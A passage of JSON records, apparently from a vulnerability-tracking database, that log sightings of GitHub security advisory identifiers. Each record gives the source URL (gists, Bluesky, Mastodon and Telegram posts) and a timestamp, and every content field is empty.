"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/90d07149bf456bffe24de786261b869a", "content": "", "creation_timestamp": "2025-07-16T13:32:55.000000Z"}, {"uuid": "d6a6eaa4-1a9d-45a9-8b34-a212d0a50b51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/90d07149bf456bffe24de786261b869a", "content": "", "creation_timestamp": "2025-07-16T13:32:55.000000Z"}, {"uuid": "42f2b07d-33e5-451d-957e-da753385808f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/f0ece275d2a5f01cdb6c494e4eda047c", "content": "", "creation_timestamp": "2025-07-16T14:08:37.000000Z"}, {"uuid": "be882867-5c2e-4102-8154-7391d9ab985e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q5r4-cfpx-h6fh", "type": "seen", "source": "https://gist.github.com/safer-bot/a17a415f7a1fd6c4a885cd5ee0694347", "content": "", "creation_timestamp": "2025-07-16T14:37:35.000000Z"}, {"uuid": "239d5fd8-39e9-4d61-a3e8-7ab6df22671d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/a17a415f7a1fd6c4a885cd5ee0694347", "content": "", "creation_timestamp": "2025-07-16T14:37:35.000000Z"}, {"uuid": "ec930e92-7bf4-4729-97e3-89ea7ef79cdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-557j-xg8c-q2mm", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3ltj64cnnqj2g", "content": "", "creation_timestamp": "2025-07-09T06:16:31.152992Z"}, {"uuid": "c23cc01d-b1b0-4be1-83e9-22f83ad3245a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/685bc6d74a8ba9535ec0a502d8e83d05", "content": "", "creation_timestamp": "2025-07-16T03:28:42.000000Z"}, {"uuid": "1d02ab11-b96e-4210-824d-24e0db75046f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/685bc6d74a8ba9535ec0a502d8e83d05", "content": "", "creation_timestamp": "2025-07-16T03:28:42.000000Z"}, {"uuid": "4d633cee-a0da-4fa8-a5f9-0696f2dcfa33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/685bc6d74a8ba9535ec0a502d8e83d05", "content": "", "creation_timestamp": "2025-07-16T03:28:42.000000Z"}, {"uuid": "181d95e2-a268-4c39-b082-a8729e0aff6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3f7h-mf4q-vrm4", "type": "seen", "source": "https://gist.github.com/safer-bot/685bc6d74a8ba9535ec0a502d8e83d05", "content": "", "creation_timestamp": "2025-07-16T03:28:42.000000Z"}, {"uuid": "0ab30b58-af35-4bf8-8b28-f95e13667c2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/685bc6d74a8ba9535ec0a502d8e83d05", "content": "", "creation_timestamp": "2025-07-16T03:28:42.000000Z"}, {"uuid": "ec336d93-16de-4124-9274-8da9eb266449", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/685bc6d74a8ba9535ec0a502d8e83d05", "content": "", "creation_timestamp": "2025-07-16T03:28:42.000000Z"}, {"uuid": "c6d87e3a-7681-4f62-a281-ed8a1a00e83b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f88-5hg8-9x2x", "type": "seen", "source": "https://gist.github.com/safer-bot/685bc6d74a8ba9535ec0a502d8e83d05", "content": "", "creation_timestamp": "2025-07-16T03:28:42.000000Z"}, {"uuid": "a7bcdd47-462e-4ca7-8b63-4935d51f8be1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-599f-7c49-w659", "type": "seen", "source": "https://gist.github.com/safer-bot/783dfe65a224789bd02fb4b05b200427", "content": "", "creation_timestamp": "2025-07-16T03:34:45.000000Z"}, {"uuid": "ec10553e-4f9f-4ad4-a229-044ba94c8bf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxr5-93ph-8wr9", "type": "seen", "source": "https://gist.github.com/safer-bot/783dfe65a224789bd02fb4b05b200427", "content": "", "creation_timestamp": "2025-07-16T03:34:45.000000Z"}, {"uuid": "7f9b24c9-7006-4cec-b809-ff64498b895b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6phf-73q6-gh87", "type": "seen", "source": "https://gist.github.com/safer-bot/783dfe65a224789bd02fb4b05b200427", "content": "", "creation_timestamp": "2025-07-16T03:34:45.000000Z"}, {"uuid": "9453f6cb-0088-48a0-9c44-1483e7771e46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6hgm-866r-3cjv", "type": "seen", "source": "https://gist.github.com/safer-bot/783dfe65a224789bd02fb4b05b200427", "content": "", "creation_timestamp": "2025-07-16T03:34:45.000000Z"}, {"uuid": "8eada7c8-6971-4317-8a9e-8da53f72e15e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fjq5-5j5f-mvxh", "type": "seen", "source": "https://gist.github.com/safer-bot/783dfe65a224789bd02fb4b05b200427", "content": "", "creation_timestamp": "2025-07-16T03:34:45.000000Z"}, {"uuid": "f6f4822e-c123-4724-8422-b330637a2a7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p66x-2cv9-qq3v", "type": "seen", "source": "https://gist.github.com/safer-bot/783dfe65a224789bd02fb4b05b200427", "content": "", "creation_timestamp": "2025-07-16T03:34:45.000000Z"}, {"uuid": "bb01f40b-ac02-4fe3-afe5-c9f94c483911", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/24f3516de0b1b7dccb1042811e161cff", "content": "", "creation_timestamp": "2025-07-16T08:24:47.000000Z"}, {"uuid": "424f06d6-9686-4557-b51c-cca6494b539f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/24f3516de0b1b7dccb1042811e161cff", "content": "", "creation_timestamp": "2025-07-16T08:24:47.000000Z"}, {"uuid": "136ed6ca-6c03-48e4-bca9-266fd551bf9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-557j-xg8c-q2mm", "type": "seen", "source": "https://bsky.app/profile/hackernewstop5.bsky.social/post/3ltj6ak6a7n27", "content": "", "creation_timestamp": "2025-07-09T06:18:53.650565Z"}, {"uuid": "69ada47a-b464-4714-86b6-ac25004367ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq2g-wx69-c263", "type": "seen", "source": "https://gist.github.com/safer-bot/26cf80d28959307815611b84ffd0e3a1", "content": "", "creation_timestamp": "2025-07-16T03:34:12.000000Z"}, {"uuid": "b52f21bf-9d05-4e39-898c-236746df8c48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/24f3516de0b1b7dccb1042811e161cff", "content": "", "creation_timestamp": "2025-07-16T08:24:47.000000Z"}, {"uuid": "341d6a96-f0d0-4554-82f9-449917176748", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8vhq-qq4p-grq3", "type": "seen", "source": "https://gist.github.com/safer-bot/24f3516de0b1b7dccb1042811e161cff", "content": "", "creation_timestamp": "2025-07-16T08:24:47.000000Z"}, {"uuid": "6a57134b-8396-4442-997f-3d97cd28d0a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/24f3516de0b1b7dccb1042811e161cff", "content": "", "creation_timestamp": "2025-07-16T08:24:47.000000Z"}, {"uuid": "22733d24-336d-4711-8190-046e6e315178", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/81646bffe43cd1a56382b27f8a74e4d7", "content": "", "creation_timestamp": "2025-07-16T08:26:59.000000Z"}, {"uuid": "d884fa67-c8ea-4c86-aa8f-51e5147a6365", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/571725a31b8cdc4bc529181b4e230f9b", "content": "", "creation_timestamp": "2025-07-16T08:26:27.000000Z"}, {"uuid": "e3ad1d54-1fb9-4e6d-8a60-807c06715023", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2474-2566-3qxp", "type": "seen", "source": "https://gist.github.com/safer-bot/2e68c14ecc155d87c9c5c84c2135887e", "content": "", "creation_timestamp": "2025-07-16T10:18:29.000000Z"}, {"uuid": "05efd5e5-d570-463b-87e1-eb871aea4175", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/2e68c14ecc155d87c9c5c84c2135887e", "content": "", "creation_timestamp": "2025-07-16T10:18:29.000000Z"}, {"uuid": "ddde70be-d68f-4f54-ad9a-989e2db0f929", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gv87-q66h-4277", "type": "seen", "source": "https://gist.github.com/safer-bot/2e68c14ecc155d87c9c5c84c2135887e", "content": "", "creation_timestamp": "2025-07-16T10:18:29.000000Z"}, {"uuid": "7e2a5acd-7b45-464c-a020-1262fc27d03c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q5r4-cfpx-h6fh", "type": "seen", "source": "https://gist.github.com/safer-bot/2e68c14ecc155d87c9c5c84c2135887e", "content": "", "creation_timestamp": "2025-07-16T10:18:29.000000Z"}, {"uuid": "eb4de57f-5e09-432b-a80c-bf27476531e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gq5f-xv48-2365", "type": "seen", "source": "https://gist.github.com/safer-bot/2e68c14ecc155d87c9c5c84c2135887e", "content": "", "creation_timestamp": "2025-07-16T10:18:29.000000Z"}, {"uuid": "dd20f550-7659-40ad-9220-b338adb7c081", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9339-86wc-4qgf", "type": "seen", "source": "https://gist.github.com/safer-bot/2e68c14ecc155d87c9c5c84c2135887e", "content": "", "creation_timestamp": "2025-07-16T10:18:29.000000Z"}, {"uuid": "d5eb425b-6227-4a51-a88e-7d5b27c39d1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-018", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lo7blnepl52p", "content": "", "creation_timestamp": "2025-05-02T16:46:11.127410Z"}, {"uuid": "15b7c389-88ad-4a9f-ad0d-dbdc4be45a0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3W2C-JFR2-9PG9", "type": "seen", "source": "https://t.me/brutsecurity/1432", "content": "", "creation_timestamp": "2026-07-10T00:00:33.619390Z"}, {"uuid": "463afe84-5846-4e5b-b2d8-ecab8f6e1409", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3hrw-xv8h-9499", "type": "seen", "source": "https://gist.github.com/EbonJaeger/085847d246bc8a2ec125431370f20129", "content": "", "creation_timestamp": "2025-05-02T21:10:10.000000Z"}, {"uuid": "879d7dd6-66a0-4af1-a30a-9034f8b294e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/90d07149bf456bffe24de786261b869a", "content": "", "creation_timestamp": "2025-07-16T13:32:55.000000Z"}, {"uuid": "06f23dad-7c32-4ee3-bbaa-088d33a0be0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-288c-cq4h-88gq", "type": "seen", "source": "https://gist.github.com/safer-bot/90d07149bf456bffe24de786261b869a", "content": "", "creation_timestamp": "2025-07-16T13:32:55.000000Z"}, {"uuid": "fb82c7b8-3a4a-4ec9-bf4f-ef0c9ceaa930", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/2eba7236bd7918e4784045080f3d9682", "content": "", "creation_timestamp": "2025-07-16T14:08:04.000000Z"}, {"uuid": "b7ccdc54-fecd-4098-b8fa-37530e9b6b16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5v34-g2px-j4fw", "type": "seen", "source": "https://gist.github.com/safer-bot/a17a415f7a1fd6c4a885cd5ee0694347", "content": "", "creation_timestamp": "2025-07-16T14:37:35.000000Z"}, {"uuid": "31e8372c-1163-4d98-9c86-5551bc826a56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/361d39b7c651551c070b03a701087903", "content": "", "creation_timestamp": "2025-07-16T14:44:41.000000Z"}, {"uuid": "f47cbab6-807a-4035-ac7b-4a8c610b347e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/bee24a8899d34ea27e82679dd39cb22a", "content": "", "creation_timestamp": "2025-07-16T14:46:55.000000Z"}, {"uuid": "df66b4e9-6a9c-4463-92e7-f1a923f634f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-89qq-hgvp-x37m", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114707989654328895", "content": "", "creation_timestamp": "2025-06-19T03:50:18.648141Z"}, {"uuid": "7c23a5eb-3d82-4f19-b76d-5e00459d08de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/1311a1d6fbeee3ebfc44b603cc3c1e8e", "content": "", "creation_timestamp": "2025-07-16T03:41:01.000000Z"}, {"uuid": "3d0761c5-e7fe-42fe-a8bc-d2df9b3f0121", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/1311a1d6fbeee3ebfc44b603cc3c1e8e", "content": "", "creation_timestamp": "2025-07-16T03:41:01.000000Z"}, {"uuid": "b338085f-e572-4092-bb69-d5470de4bcf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/558d37f41c5ff4ac289f774151dbeb8e", "content": "", "creation_timestamp": "2025-07-16T08:27:57.000000Z"}, {"uuid": "950a9a2a-f2e8-4991-838f-c2df039867b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq2g-wx69-c263", "type": "seen", "source": "https://gist.github.com/safer-bot/558d37f41c5ff4ac289f774151dbeb8e", "content": "", "creation_timestamp": "2025-07-16T08:27:57.000000Z"}, {"uuid": "39762c0c-c205-405a-974f-9a9b4810c402", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m44j-cfrm-g8qc", "type": "seen", "source": "https://gist.github.com/safer-bot/558d37f41c5ff4ac289f774151dbeb8e", "content": "", "creation_timestamp": "2025-07-16T08:27:57.000000Z"}, {"uuid": "09b8971a-9133-4ff9-a500-67d6da502d34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/558d37f41c5ff4ac289f774151dbeb8e", "content": "", "creation_timestamp": "2025-07-16T08:27:57.000000Z"}, {"uuid": "2cdd60cd-1ca4-4fea-a097-606c26d81117", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h8f-2wvx-gg5w", "type": "seen", "source": "https://gist.github.com/safer-bot/558d37f41c5ff4ac289f774151dbeb8e", "content": "", "creation_timestamp": "2025-07-16T08:27:57.000000Z"}, {"uuid": "8a162a55-29ca-4f05-839f-f2e1f346bef7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/558d37f41c5ff4ac289f774151dbeb8e", "content": "", "creation_timestamp": "2025-07-16T08:27:57.000000Z"}, {"uuid": "9ae5d58d-7893-4bb2-a7f2-615b89d256c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/558d37f41c5ff4ac289f774151dbeb8e", "content": "", "creation_timestamp": "2025-07-16T08:27:57.000000Z"}, {"uuid": "edc74bf2-1495-4db0-a1f3-78a8f7e02c58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/558d37f41c5ff4ac289f774151dbeb8e", "content": "", "creation_timestamp": "2025-07-16T08:27:57.000000Z"}, {"uuid": "8d23056a-3986-4fcd-bf43-484638cf86a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/558d37f41c5ff4ac289f774151dbeb8e", "content": "", "creation_timestamp": "2025-07-16T08:27:57.000000Z"}, {"uuid": "1beaf098-69f3-43a7-a309-7d52e0fe1d52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/558d37f41c5ff4ac289f774151dbeb8e", "content": "", "creation_timestamp": "2025-07-16T08:27:57.000000Z"}, {"uuid": "bf05d719-ef57-42e9-8009-7b7490f4a115", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jqq5-wc57-f8hj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114541423678244181", "content": "", "creation_timestamp": "2025-05-20T17:50:23.229656Z"}, {"uuid": "369c746b-edbc-4d39-b40a-014e9f04e36a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/a2f85bb3abd40ab169cfae05635f3231", "content": "", "creation_timestamp": "2025-07-16T03:44:39.000000Z"}, {"uuid": "986e49db-0524-40e9-8c7e-d365807ea0b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cm76-qm8v-3j95", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114541619532659321", "content": "", "creation_timestamp": "2025-05-20T18:40:13.048222Z"}, {"uuid": "a1688f64-8cd0-46fd-a4e8-9f10802cf970", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hjq4-87xh-g4fv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114541634791270960", "content": "", "creation_timestamp": "2025-05-20T18:44:05.055749Z"}, {"uuid": "b7e06de7-5853-4420-94e6-b435bf48b814", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/a2f85bb3abd40ab169cfae05635f3231", "content": "", "creation_timestamp": "2025-07-16T03:44:39.000000Z"}, {"uuid": "c23e3b89-cc99-4b47-8f0e-7b4ab7622457", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/a2f85bb3abd40ab169cfae05635f3231", "content": "", "creation_timestamp": "2025-07-16T03:44:39.000000Z"}, {"uuid": "82bbf514-37da-4fdb-b777-7503acd9e385", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f88-5hg8-9x2x", "type": "seen", "source": "https://gist.github.com/safer-bot/a2f85bb3abd40ab169cfae05635f3231", "content": "", "creation_timestamp": "2025-07-16T03:44:39.000000Z"}, {"uuid": "ca7d2df3-b88b-43e1-8af5-9aaeb28a464b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/c75be349324ad1aff79587c1c14593df", "content": "", "creation_timestamp": "2025-07-16T08:29:39.000000Z"}, {"uuid": "58e76ad5-21d6-4e1b-80a1-87431b3f3369", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/c75be349324ad1aff79587c1c14593df", "content": "", "creation_timestamp": "2025-07-16T08:29:39.000000Z"}, {"uuid": "44e0563a-5add-42ca-9669-ba3ed35ec75b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-859w-5945-r5v3", "type": "seen", "source": "https://bsky.app/profile/mynameisv.bsky.social/post/3lofscowf6k2y", "content": "", "creation_timestamp": "2025-05-05T07:01:24.697161Z"}, {"uuid": "0fe80f94-8d0c-4a00-aa98-5a93f189663a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/a2f85bb3abd40ab169cfae05635f3231", "content": "", "creation_timestamp": "2025-07-16T03:44:39.000000Z"}, {"uuid": "0653968c-7e07-4baa-a85c-72cad1ae4d05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/a2f85bb3abd40ab169cfae05635f3231", "content": "", "creation_timestamp": "2025-07-16T03:44:39.000000Z"}, {"uuid": "cc53a2aa-3c64-4182-8ab4-756828fc8b11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/c75be349324ad1aff79587c1c14593df", "content": "", "creation_timestamp": "2025-07-16T08:29:39.000000Z"}, {"uuid": "b231b704-0293-4a6f-a418-59053008e2c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8vhq-qq4p-grq3", "type": "seen", "source": "https://gist.github.com/safer-bot/c75be349324ad1aff79587c1c14593df", "content": "", "creation_timestamp": "2025-07-16T08:29:39.000000Z"}, {"uuid": "3c7c18ba-f71b-4d98-abdf-f00de3092d73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/c75be349324ad1aff79587c1c14593df", "content": "", "creation_timestamp": 